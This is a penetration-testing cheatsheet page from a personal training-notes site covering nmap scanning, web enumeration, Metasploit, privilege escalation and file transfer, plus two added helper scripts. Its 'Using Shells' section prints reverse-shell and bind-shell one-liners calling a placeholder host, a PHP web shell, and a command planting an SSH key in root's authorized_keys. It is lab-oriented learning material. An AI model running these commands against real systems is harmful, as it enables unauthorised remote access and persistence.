âŗ
Ichyaboy
  • 👋Ichyaboy
  • Hackthebox Related
    • 🎰Machines
      • Linux based Machines
        • Talkative
        • Encoding
      • Windows based machines
        • Silo
    • đŸ•šī¸Challenges (coming soon)
  • Portswigger Related
    • 🔧Server-side topics
      • Business logic flaws
        • Excessive trust in client-side controls
        • 2FA Broken Logic
        • High-level logic vulnerability
        • Inconsistent handling of exceptional input
        • Inconsistent security controls
        • Weak isolation on dual-use endpoint
        • Low-level logic flaw
        • Infinite money logic flaw
      • Information Disclosure
        • Information disclosure in error messages
        • Information disclosure on debug page
        • Source code disclosure via backup files
        • Authentication bypass via information disclosure
        • Information disclosure in version control history
      • Access Control
        • Unprotected admin functionality
        • Unprotected admin functionality with unpredictable URL
        • User role controlled by request parameter
        • User role can be modified in user profile
        • User ID controlled by request parameter
        • User ID controlled by request parameter, with unpredictable user IDs
        • User ID controlled by request parameter with data leakage in redirect
        • User ID controlled by request parameter with password disclosure
        • Insecure direct object references
        • URL-based access control can be circumvented
        • Method-based access control can be circumvented
        • Multi-step process with no access control on one step
        • Referer-based access control
      • File Upload
        • Remote code execution via web shell upload
        • Web shell upload via Content-Type restriction bypass
        • Web shell upload via path traversal
        • Web shell upload via extension blacklist bypass
        • Web shell upload via obfuscated file extension
        • Remote code execution via polyglot web shell upload
        • Web shell upload via race condition
      • Race Conditions
        • Limit overrun race conditions
        • Bypassing rate limits via race conditions
        • Multi endpoint race conditions
        • Single endpoint race conditions
        • Time sensitive vulnerabilities
        • Partial construction race conditions
      • SSRF
        • Basic SSRF against the local server
        • Basic SSRF against another back end system
        • Blind SSRF with out of band detection
        • SSRF with blacklist based input filter
        • SSRF with filter bypass via open redirection vulnerability
        • Blind SSRF with Shellshock exploitation
        • SSRF with whitelist based input filter
      • XXE Injection
        • Exploiting XXE using external entities to retrieve files
        • Exploiting XXE to perform SSRF attacks
        • Blind XXE with out of band interaction
        • Blind XXE with out of band interaction via XML parameter entities
        • Exploiting blind XXE to exfiltrate data using a malicious external DTD
        • Exploiting blind XXE to retrieve data via error messages
        • Exploiting XInclude to retrieve files
        • Exploiting XXE via image file upload
        • Exploiting XXE to retrieve data by repurposing a local DTD
      • Nosql Injection
        • Detecting NoSQL injection
        • Exploiting NoSQL operator injection to bypass authentication
        • Exploiting NoSQL injection to extract data
        • Exploiting NoSQL operator injection to extract unknown fields
      • Api Testing
        • Exploiting an API endpoint using documentation
        • Exploiting server side parameter pollution in a query string
        • Finding and exploiting an unused API endpoint
        • Exploiting a mass assignment vulnerability
        • Exploiting server side parameter pollution in a REST URL
    • đŸŽ¯Client-side topics
      • Cross-site scripting (XSS)
        • Stored XSS
          • Stored XSS into HTML context with nothing encoded
          • Stored XSS into anchor href attribute with double quotes HTML encoded
          • Stored XSS into onclick event with angle brackets and double quotes HTML encoded and single quotes and backslash escaped
        • Reflected XSS
          • Reflected XSS into HTML context with nothing encoded
          • Reflected XSS into attribute with angle brackets HTML encoded
          • Reflected XSS into a JavaScript string with angle brackets HTML encoded
          • Reflected XSS into HTML context with most tags and attributes blocked
          • Reflected XSS into HTML context with all tags blocked except custom ones
          • Reflected XSS with some SVG markup allowed
          • Reflected XSS in canonical link tag
          • Reflected XSS into a JavaScript string with single quote and backslash escaped
          • Reflected XSS into a JavaScript string with angle brackets and double quotes HTML encoded and single quotes escaped
          • Reflected XSS into a template literal with angle brackets, single, double quotes, backslash and backticks Unicode escaped
          • Reflected XSS with event handlers and href attributes blocked
          • Reflected XSS in a JavaScript URL with some characters blocked
        • DOM-based XSS
          • DOM XSS in document.write sink using source location.search
          • DOM XSS in innerHTML sink using source location.search
          • DOM XSS in jQuery anchor href attribute sink using location.search source
          • DOM XSS in jQuery selector sink using a hashchange event
          • DOM XSS in document.write sink using source location.search inside a select element
          • DOM XSS in AngularJS expression with angle brackets and double quotes HTML encoded
          • Reflected DOM XSS
          • Stored DOM XSS
        • CSP Bypass
          • Reflected XSS protected by CSP, with CSP bypass
          • Reflected XSS protected by very strict CSP, with dangling markup attack
        • Client-side template injection
          • Reflected XSS with AngularJS sandbox escape without strings
          • Reflected XSS with AngularJS sandbox escape and CSP
        • Common XSS Attacks
          • Exploiting cross site scripting to steal cookies
          • Exploiting cross site scripting to capture passwords
          • Exploiting XSS to perform CSRF
      • WebSockets
        • Manipulating WebSocket messages to exploit vulnerabilities
        • Cross site WebSocket hijacking
        • Manipulating the WebSocket handshake to exploit vulnerabilities
      • Cross-site Request forgery (CSRF)
        • CSRF vulnerability with no defenses
        • CSRF where token validation depends on request method
        • CSRF where token validation depends on token being present
        • CSRF where token is not tied to user session
        • CSRF where token is tied to non session cookie
        • CSRF where token is duplicated in cookie
        • SameSite Lax bypass via method override
        • SameSite Strict bypass via client side redirect
        • SameSite Strict bypass via sibling domain
        • SameSite Lax bypass via cookie refresh
        • CSRF where Referer validation depends on header being present
        • CSRF with broken Referer validation
      • Cross-origin resource sharing
        • CORS vulnerability with basic origin reflection
        • CORS vulnerability with trusted null origin
        • CORS vulnerability with trusted insecure protocols
      • Clickjacking
        • Basic clickjacking with CSRF token protection
        • Clickjacking with form input data prefilled from a URL parameter
        • Clickjacking with a frame buster script
        • Exploiting clickjacking vulnerability to trigger DOM based XSS
        • Multistep clickjacking
      • DOM-based vulnerabilities
        • DOM XSS using web messages
        • DOM XSS using web messages and a JavaScript URL
        • DOM XSS using web messages and JSON.parse
        • DOM based open redirection
        • DOM based cookie manipulation
        • Exploiting DOM clobbering to enable XSS
        • Clobbering DOM attributes to bypass HTML filters
  • Resources
    • đŸŗī¸Cheatsheets
      • Basic Tools
      • Footprinting
      • Web Inofrmation Gathering
      • Nmap
      • File Transfer
      • Passwords Attacks
      • USING THE METASPLOIT FRAMEWORK
      • Shells & Payloads
      • Attacking Common Services
      • Pivoting, Tunneling, and Port Forwarding
    • 🏴Useful Scripts
      • NoSQL REGEX Password Length
      • NoSQL REGEX Password
      • Creds BruteForce CSRF Handling
Powered by GitBook
On this page
  • Basic Tools
  • General
  • FTP
  • TMUX
  • VIM
  • Pentesting
  • Web Enumeration
  • Public Exploits
  • Using Shells
  • Privilege Escalation
  • Transferring Files
  1. Resources
  2. Cheatsheets

Basic Tools

Basic Tools

General

Command                                                 Description
sudo openvpn user.ovpn                                  Connect to the VPN
ip a  (or ifconfig)                                     Show our IP address
netstat -rn                                             Show the routing table, i.e. the networks reachable via the VPN
ssh user@10.10.10.10                                    SSH to a remote server
ftp 10.129.42.253                                       FTP to a remote server

FTP

Command                                                 Description
ftp <FQDN/IP>                                           Interact with the FTP service on the target.
nc -nv <FQDN/IP> 21                                     Interact with the FTP service on the target (raw, for banner grabbing and manual commands).
telnet <FQDN/IP> 21                                     Interact with the FTP service on the target.
openssl s_client -connect <FQDN/IP>:21 -starttls ftp    Interact with the FTP service on the target over an encrypted (FTPS via STARTTLS) connection.
wget -m --no-passive-ftp ftp://anonymous:anonymous@<target>
                                                        Mirror (download) all files available to the anonymous user on the target FTP server.

TMUX

Command                                                 Description
tmux                                                    Start tmux
ctrl+b                                                  tmux: default prefix
prefix c                                                tmux: new window
prefix 1                                                tmux: switch to window 1
prefix %                                                tmux: split pane vertically (panes side by side)
prefix "                                                tmux: split pane horizontally (panes stacked)
prefix → (right arrow)                                  tmux: switch to the pane on the right

VIM

Command                                                 Description
vim file                                                vim: open file with vim
i                                                       vim: enter insert mode (from normal mode)
esc                                                     vim: back to normal mode
x                                                       vim: cut character
dw                                                      vim: cut word
dd                                                      vim: cut full line
yw                                                      vim: copy word
yy                                                      vim: copy full line
p                                                       vim: paste
:1                                                      vim: go to line number 1
:w                                                      vim: write the file (i.e. save)
:q                                                      vim: quit
:q!                                                     vim: quit without saving
:wq                                                     vim: write and quit

Pentesting

Service Scanning

Command                                                 Description
nmap 10.129.42.253                                      Run a default nmap scan on an IP (top 1000 TCP ports)
nmap -sV -sC -p- 10.129.42.253                          Scan all TCP ports with version detection (-sV) and default scripts (-sC)
locate scripts/citrix                                   Find installed nmap scripts by name (here, anything matching citrix)
nmap --script smb-os-discovery.nse -p445 10.10.10.40    Run a specific nmap script against a port
nc -nv 10.10.10.10 22                                   Grab the banner of an open port
smbclient -N -L \\\\10.129.42.253                       List SMB shares (null session, no password)
smbclient \\\\10.129.42.253\\users                      Connect to an SMB share
snmpwalk -v 2c -c public 10.129.42.253 1.3.6.1.2.1.1.5.0
                                                        Query SNMP with the community string "public" (OID 1.3.6.1.2.1.1.5.0 is sysName)
onesixtyone -c dict.txt 10.129.42.254                   Brute force the SNMP community string from a wordlist
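The two nmap lines above are normally run as a pipeline: a fast full-range sweep first, then -sV -sC only on the ports found open, because script and version scans across all 65535 ports are slow. The script below is an added example, not part of the original cheatsheet; it parses nmap's grepable (-oG) output and builds the second-stage command. The hosts and the sample scan output are constructed here, so the parser can be exercised without nmap installed.

```shell
#!/bin/sh
# Added example, not from the original page: a two-stage nmap workflow.
# Stage 1 is a fast full-port sweep saved in grepable format; stage 2 runs
# the slower -sV -sC scan only on the ports stage 1 found open.
# The parser is exercised against a constructed -oG file (sample_gnmap),
# so nmap itself is only needed for the real run shown at the bottom.

# Print "host port,port,..." for every host with at least one open port.
# Reads nmap -oG output from the files given as arguments, or from stdin.
parse_open_ports() {
    awk '
        /^Host:/ && /Ports:/ {
            host = $2                      # IP sits right after "Host:"
            sub(/.*Ports: /, "")           # keep only the port list
            n = split($0, entries, ", ")
            olist = ""
            for (i = 1; i <= n; i++) {
                split(entries[i], f, "/")  # port/state/proto/owner/service/...
                if (f[2] == "open")        # drops closed, filtered, open|filtered
                    olist = (olist == "" ? f[1] : olist "," f[1])
            }
            if (olist != "") print host, olist
        }' "$@"
}

# Build the stage-2 command for one host from its open-port list.
targeted_scan_cmd() {
    printf 'nmap -sV -sC -p%s %s\n' "$2" "$1"
}

# One stage-2 command line per host.
stage2_commands() {
    parse_open_ports "$@" | while read -r host ports; do
        targeted_scan_cmd "$host" "$ports"
    done
}

# Constructed stage-1 output in the shape nmap -oG writes; the hosts and
# services are assumptions for the demo, not real scan results.
sample_gnmap() {
    printf '# Nmap 7.94 scan initiated as: nmap -p- -oG stage1.gnmap 10.129.42.0/24\n'
    printf 'Host: 10.129.42.253 ()\tStatus: Up\n'
    printf 'Host: 10.129.42.253 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 445/filtered/tcp//microsoft-ds///\tIgnored State: closed (65532)\n'
    printf 'Host: 10.129.42.254 ()\tPorts: 21/closed/tcp//ftp///\tIgnored State: filtered (65534)\n'
    printf '# Nmap done -- 256 IP addresses (2 hosts up) scanned\n'
}

# Demo against the constructed sample (prints the stage-2 command line):
sample_gnmap | stage2_commands
# Real use: nmap -p- -T4 -oG stage1.gnmap 10.129.42.253 && stage2_commands stage1.gnmap | sh
```

Only ports whose state is exactly "open" are kept; "filtered" and "open|filtered" entries are dropped so the targeted scan is not padded with ports that will only time out.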

Web Enumeration

Command                                                 Description
gobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txt
                                                        Run a directory brute-force scan on a website
gobuster dns -d inlanefreight.com -w /usr/share/SecLists/Discovery/DNS/namelist.txt
                                                        Run a sub-domain brute-force scan on a domain
curl -IL https://www.inlanefreight.com                  Grab the website's response headers (server banner), following redirects
whatweb 10.10.10.121                                    List details about the web server, frameworks and certificates
curl 10.10.10.121/robots.txt                            List potential directories disclosed in robots.txt
ctrl+U                                                  View page source (in Firefox)

Public Exploits

Command                                                 Description
searchsploit openssh 7.2                                Search Exploit-DB for public exploits for a service and version
msfconsole                                              MSF: start the Metasploit Framework
search exploit eternalblue                              MSF: search for public exploits in MSF
use exploit/windows/smb/ms17_010_psexec                 MSF: select an MSF module
show options                                            MSF: show the options (and which are required) for the module
set RHOSTS 10.10.10.40                                  MSF: set a value for a module option
check                                                   MSF: test whether the target is vulnerable (if the module supports it)
exploit                                                 MSF: run the exploit against the target

Using Shells

Command                                                 Description
nc -lvnp 1234                                           Start a nc listener on a local port
bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1'     Send a reverse shell from the remote server (bash /dev/tcp, no nc needed)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f
                                                        Another reverse shell from the remote server (sh + nc via a named pipe)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f
                                                        Start a bind shell on the remote server
nc 10.10.10.1 1234                                      Connect to a bind shell started on the remote server
python -c 'import pty; pty.spawn("/bin/bash")'          Upgrade the shell to a TTY (1); use python3 if python is not present
ctrl+z, then stty raw -echo, then fg, then press enter twice
                                                        Upgrade the shell to a TTY (2): hand local terminal control to the remote shell
echo "<?php system(\$_GET['cmd']);?>" > /var/www/html/shell.php
                                                        Create a PHP web shell (the \$ stops the local shell from expanding $_GET)
curl http://SERVER_IP:PORT/shell.php?cmd=id             Execute a command through the uploaded web shell

Privilege Escalation

Command                                                 Description
./linpeas.sh                                            Run the LinPEAS script to enumerate the target for escalation paths
sudo -l                                                 List the sudo privileges of the current user
sudo -u user /bin/echo Hello World!                     Run a command as another user with sudo
sudo su -                                               Switch to the root user (if sudo su is allowed)
sudo su - user                                          Switch to another user (if sudo su is allowed)
ssh-keygen -f key                                       Generate a new SSH key pair (private key "key", public key "key.pub")
echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys
                                                        Add the generated public key to root's authorized_keys (requires write access to that file)
ssh root@10.10.10.10 -i key                             SSH to the server with the generated private key

Transferring Files

Command                                                 Description
python3 -m http.server 8000                             Start a local web server on port 8000
wget http://10.10.14.1:8000/linpeas.sh                  Download a file onto the remote server from our local machine
curl http://10.10.14.1:8000/linenum.sh -o linenum.sh    Download a file onto the remote server from our local machine
scp linenum.sh user@remotehost:/tmp/linenum.sh          Transfer a file to the remote server with scp (requires SSH access)
base64 -w 0 shell                                       Encode a file as a single base64 line (to paste into the remote shell)
echo f0VMR...SNIP...InmDwU | base64 -d > shell          Decode the pasted base64 back into the original file
md5sum shell                                            Compare the file's md5sum on both ends to confirm it transferred intact
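The last three rows are one procedure: encode locally, paste into the remote shell, decode, then compare checksums. The script below is an added example, not part of the original cheatsheet; it wraps the three steps in functions and runs them end to end on a constructed binary sample so the round trip can be checked offline. The sample file and its contents are assumptions for the demo.

```shell
#!/bin/sh
# Added example, not from the original page: the base64 "paste transfer"
# from the table, wrapped in functions and checked end to end. This is the
# fallback when the only channel to the target is an interactive shell and
# neither a web server nor scp is reachable. The sample file is constructed
# here; in a real transfer encode_file runs locally and decode_to_file runs
# on the target.

# Encode a file as one base64 line (-w 0 disables line wrapping), ready to paste.
encode_file() {
    base64 -w 0 "$1"
}

# Decode a pasted blob from stdin into a file on the receiving side.
decode_to_file() {
    base64 -d > "$1"
}

# Compare md5sums of the original and the received copy. This catches
# truncation or a mangled paste; it is not a defence against tampering.
verify_transfer() {
    orig=$(md5sum "$1" | cut -d' ' -f1)
    copy=$(md5sum "$2" | cut -d' ' -f1)
    if [ "$orig" = "$copy" ]; then echo ok; else echo MISMATCH; fi
}

# Full round trip on a constructed binary: an ELF-like header with NUL and
# high bytes, exactly the content a plain cat/paste would corrupt.
roundtrip_demo() {
    dir=$(mktemp -d)
    printf '\177ELF\001\001\001\000\000\377\376payload\n' > "$dir/shell"
    blob=$(encode_file "$dir/shell")                          # local side: what you copy
    printf '%s' "$blob" | decode_to_file "$dir/shell.copy"    # remote side: what you paste
    result=$(verify_transfer "$dir/shell" "$dir/shell.copy")
    rm -rf "$dir"
    echo "$result"
}

roundtrip_demo
```

On the target the decode step is typically typed as `echo '<blob>' | base64 -d > shell`; keep the blob on one line (hence -w 0), and if the checksums differ the usual cause is a terminal that wrapped or dropped part of the paste, so re-send in smaller chunks.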
